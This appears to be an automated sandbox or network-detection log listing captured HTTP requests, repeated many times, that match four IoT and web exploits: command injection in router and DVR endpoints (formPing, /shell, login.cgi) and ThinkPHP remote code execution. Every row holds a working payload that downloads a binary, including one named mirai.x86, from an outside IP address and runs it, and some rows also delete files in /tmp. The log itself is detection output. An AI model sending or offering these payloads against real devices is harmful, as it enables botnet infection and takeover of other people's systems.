| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
